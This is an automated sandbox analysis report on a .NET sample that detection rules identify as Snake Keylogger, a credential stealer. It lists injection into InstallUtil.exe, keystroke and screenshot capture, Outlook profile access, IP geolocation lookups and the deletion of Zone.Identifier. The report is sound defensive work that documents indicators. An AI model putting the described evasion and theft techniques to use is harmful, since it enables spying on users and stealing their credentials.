                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.000000000403C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000413E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004042000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000411A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004017000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.000000000403C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000413E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004042000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000411A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004017000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBiq
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.cs | .Net Code: TakeScreenshot
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.cs | .Net Code: VKCodeToUnicode

                    System Summary

                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Code function: 0_2_08EAB178 CreateProcessAsUserW
                    Source: pbCN4g6sN5.exe, 00000000.00000000.1652684658.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2374378056.000000000057E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2387318301.00000000076F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMofInagitap.dll8 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMofInagitap.dll8 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe | Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: pbCN4g6sN5.exe, d3A5.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.4b30000.4.raw.unpack, Class12_Startup.cs | Task registration methods: 'CreateCanceledTask'
                    Source: 0.2.pbCN4g6sN5.exe.365d150.3.raw.unpack, Class12_Startup.cs | Task registration methods: 'CreateCanceledTask'
                    Source: 0.2.pbCN4g6sN5.exe.36a2f30.0.raw.unpack, Class12_Startup.cs | Task registration methods: 'CreateCanceledTask'
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pbCN4g6sN5.exe.log
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                    Source: pbCN4g6sN5.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: pbCN4g6sN5.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: pbCN4g6sN5.exe | ReversingLabs: Detection: 71%
                    Source: unknown | Process created: C:\Users\user\Desktop\pbCN4g6sN5.exe "C:\Users\user\Desktop\pbCN4g6sN5.exe"
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: pbCN4g6sN5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: pbCN4g6sN5.exe	Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.36a2f30.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.365d150.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.4b30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.36a2f30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.4b30000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.365d150.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2376499978.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
Source: pbCN4g6sN5.exe, o1K.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_0597E0DF push ds; retf 0_2_0597E0EF
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_05977C42 push eax; ret 0_2_05977C49
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_06D0814D pushfd ; retf 0_2_06D0814E
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_0764BFBA pushad ; ret 0_2_0764C015
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_0764984F push esp; retf 6987h 0_2_07649AB9
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_077F9745 push edx; ret 0_2_077F974B
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Code function: 0_2_077F2555 push edi; iretd 0_2_077F2556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BEA088 pushad ; retn 0002h 5_2_02BEA0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE9089 push ebx; retn 0002h 5_2_02BE908A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BEA0E8 pushad ; retn 0002h 5_2_02BEA0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE9611 push edi; retn 0002h 5_2_02BE9612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE8490 push edx; retn 0002h 5_2_02BE8EEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE8481 push ecx; retn 0002h 5_2_02BE8482
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE9468 push esi; retn A802h 5_2_02BE961A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE9459 push esi; retn 0002h 5_2_02BE945A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE48D7 push eax; retn 0070h 5_2_02BE4922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE498A push eax; retn 0070h 5_2_02BE4962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE4927 push eax; retn 0070h 5_2_02BE4912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE4927 push eax; retn 0070h 5_2_02BE4962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE4977 push eax; retn 0070h 5_2_02BE4982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_02BE9DE0 pushad ; retn 0002h 5_2_02BEA02A
Source: pbCN4g6sN5.exe	Static PE information: section name: .text entropy: 7.045918402735076

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	File opened: C:\Users\user\Desktop\pbCN4g6sN5.exe\:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\pbCN4g6sN5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

